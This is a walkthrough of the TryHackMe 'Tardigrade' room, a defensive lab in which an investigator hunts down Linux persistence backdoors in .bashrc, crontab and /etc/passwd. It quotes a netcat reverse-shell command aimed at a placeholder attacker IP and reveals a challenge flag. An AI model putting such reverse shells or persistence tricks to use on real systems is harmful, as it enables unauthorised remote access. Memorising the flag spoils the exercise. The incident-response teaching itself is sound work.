We covered three of the most common Linux persistence techniques such as writing commands in .bashrc file, scheduled tasks in crontab and adding a user in /etc/passwd file. This was part of TryHackMe Tardigrade.

A server has been compromised, and the security team has decided to isolate the machine until it’s been thoroughly cleaned up. Initial checks by the Incident Response team revealed that there are five different backdoors. It’s your job to find and remediate them before giving the signal to bring the server back to production.

A dirty wordlist is essentially raw documentation of the investigation from the investigator’s perspective. It may contain everything that would help lead the investigation forward, from actual IOCs to random notes. Keeping a dirty wordlist assures the investigator that a specific IOC has already been recorded, helping keep the investigation on track and preventing getting stuck in a closed loop of used leads.

It also helps the investigator remember the mindset that they had during the course of the investigation. The importance of taking note of one’s mindset during different points of an investigation is usually given less importance in favour of focusing on the more exciting atomic indicators; however, recording it provides further context on why a specific bit is recorded in the first place. This is how pivot points are decided and further leads, born and pursued.

The advantages of a dirty wordlist don’t end here. A quick way to formally document findings at the end of the investigation is to clean them up. It is recommended to put in every sort of detail that may help during the course of the investigation. So, in the end, it would be easy to remove all the unneeded details and false leads, enrich actual IOCs, and establish points of emphasis. The flag for this task is: THM{d1rty_w0rdl1st}

Investigating the georgio Account

I started by connecting to the machine via SSH using the provided credentials for the user georgio. I checked the user’s privileges with id and sudo -l and found that georgio could run all commands as root. In georgio‘s home directory (/home/georgio), I listed all files using ls -la. I discovered a suspicious file named badbash with the SUID bit set and owned by root. Running ./badbash spawned a new shell.

I then examined the .bashrc file using cat .bashrc. I found an alias for ls that was actually a Bash reverse shell command. This is a persistence mechanism that executes when the user logs in. Next, I checked the scheduled tasks for georgio using crontab -e. I found a scheduled task that used netcat to establish a reverse shell to an attacker’s IP and port. This is another persistence method. To find the server’s OS version, I used the command cat /etc/lsb-release.

Investigating the root Account

I switched to the root user using su root. Shortly after logging in as root, I observed a “netcat: timeout” error message. This error was followed by a suspicious command appearing in the terminal: netcat -e /bin/bash <attacker_IP> 6969. This indicated another attempt to establish a reverse shell. To understand the source of this behavior, I examined the root user’s .bashrc file (cat /root/.bashrc). I found a line in the root’s .bashrc that was responsible for initiating this netcat connection upon login.

Investigating the System (Password File)

I investigated the /etc/passwd file using cat /etc/passwd to look for suspicious user accounts. I found that the nobody user had been modified to have /bin/bash as its shell and a home directory of /nonexistent. This is a way an attacker can create a backdoor user. I navigated to this /nonexistent directory (cd /nonexistent) and listed its contents (ls -la). Inside this directory, I found a file named .youfoundme. Viewing its contents with cat .youfoundme revealed the final flag for the challenge.

Summary of Persistence Mechanisms Covered

  1. .bashrc file modifications: Adding commands or aliases that execute upon user login to establish reverse shells or perform other malicious actions.
  2. Crontab (Scheduled Tasks): Scheduling commands (like netcat reverse shells) to run at regular intervals.
  3. /etc/passwd file manipulation: Modifying existing user accounts (like nobody) or adding new users with valid shells to create backdoors.

This video demonstrates common ways attackers can maintain access to a compromised Linux system.

Technical Commands Used

  • id
  • sudo -l
  • ls -la
  • ./badbash
  • cat .bashrc
  • crontab -e
  • cat /etc/lsb-release
  • su root
  • cat /root/.bashrc
  • cat /etc/passwd
  • cd /nonexistent
  • cat .youfoundme

TryHackMe Tardigrade Room Answers

What is the server’s OS version?

What’s the most interesting file you found in giorgio’s home directory?

 

In every investigation, it’s important to keep a dirty wordlist to keep track of all your findings, no matter how small. It’s also a way to prevent going back in circles and starting from scratch again. As such, now’s a good time to create one and put the previous answer as an entry so we can go back to it later.

Another file that can be found in every user’s home directory is the .bashrc file. Can you check if you can find something interesting in giorgio’s .bashrc?

 

It seems we’ve covered the usual bases in giorgio’s home directory, so it’s time to check the scheduled tasks that he owns.

Did you find anything interesting about scheduled tasks?

This section is a bonus discussion on the importance of a dirty wordlist. Accept the extra point and happy hunting!

What is the flag?

A few moments after logging on to the root account, you find an error message in your terminal.

What does it say?

 

After moving forward with the error message, a suspicious command appears in the terminal as part of the error message.

What command was displayed?

 

You might wonder, “how did that happen? I didn’t even do anything? I just logged as root, and it happened.”

Can you find out how the suspicious command has been implemented?

There’s one more persistence mechanism in the system.

A good way to systematically dissect the system is to look for “usuals” and “unusuals”. For example, you can check for commonly abused or unusual files and directories.

This specific persistence mechanism is directly tied to something (or someone?) already present in fresh Linux installs and may be abused and/or manipulated to fit an adversary’s goals. What’s its name?

What is the last persistence mechanism?

Finally, as you’ve already found the final persistence mechanism, there’s value in going all the way through to the end.

The adversary left a golden nugget of “advise” somewhere.

What is the nugget?

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles